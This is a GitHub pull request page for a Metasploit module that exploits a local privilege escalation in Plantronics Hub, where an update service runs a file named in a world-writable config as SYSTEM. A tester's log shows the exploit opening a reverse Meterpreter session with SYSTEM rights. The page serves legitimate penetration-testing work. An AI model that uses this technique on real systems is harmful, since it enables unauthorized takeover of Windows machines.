Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Plantronics Hub SpokesUpdateService Privilege Escalation #12782

Merged
merged 2 commits into from
Jan 15, 2020
Merged

Add Plantronics Hub SpokesUpdateService Privilege Escalation #12782

merged 2 commits into from
Jan 15, 2020

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Jan 3, 2020

Add Plantronics Hub SpokesUpdateService Privilege Escalation module.

    The Plantronics Hub client application for Windows makes use of an
    automatic update service `SpokesUpdateService.exe` which automatically
    executes a file specified in the `MajorUpgrade.config` configuration
    file as SYSTEM. The configuration file is writable by all users by default.

    This module has been tested successfully on Plantronics Hub version 3.13.2
    on Windows 7 SP1 (x64).

Resolves #12781

@smcintyre-r7 smcintyre-r7 self-assigned this Jan 3, 2020
@smcintyre-r7
Copy link
Contributor

Just tested this and it's working as intended on Windows 10 x64.

msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
[*] The service is running, but could not be validated.
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > exploit

[*] Started reverse TCP handler on 192.168.44.128:4444 
[*] Sending stage (180291 bytes) to 192.168.44.130
[*] Meterpreter session 2 opened (192.168.44.128:4444 -> 192.168.44.130:53873) at 2020-01-15 10:35:43 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

smcintyre-r7 added a commit that referenced this pull request Jan 15, 2020
@smcintyre-r7
Land #12782, add the Plantronics LPE module
033a0d1
@smcintyre-r7 smcintyre-r7 merged commit c8fb761 into rapid7:master Jan 15, 2020
@smcintyre-r7
Copy link
Contributor

Merged, thanks @bcoles!

msjenkins-r7 pushed a commit that referenced this pull request Jan 15, 2020
@smcintyre-r7 @msjenkins-r7
Land #12782, add the Plantronics LPE module
5e8b13b
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds a module for exploiting a local privilege escalation vulnerability within the Plantronics Hub software. This vulnerability, identified as 2019-15742, has been tested on Windows 7 x64 and Windows 10 x64 where it will yield a session as NT AUTHORITY\SYSTEM.

@bcoles bcoles deleted the plantronics_hub_spokesupdateservice_privesc branch January 15, 2020 23:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Add Plantronics Hub 3.13.2 - Local Privilege Escalation
2 participants
@bcoles @smcintyre-r7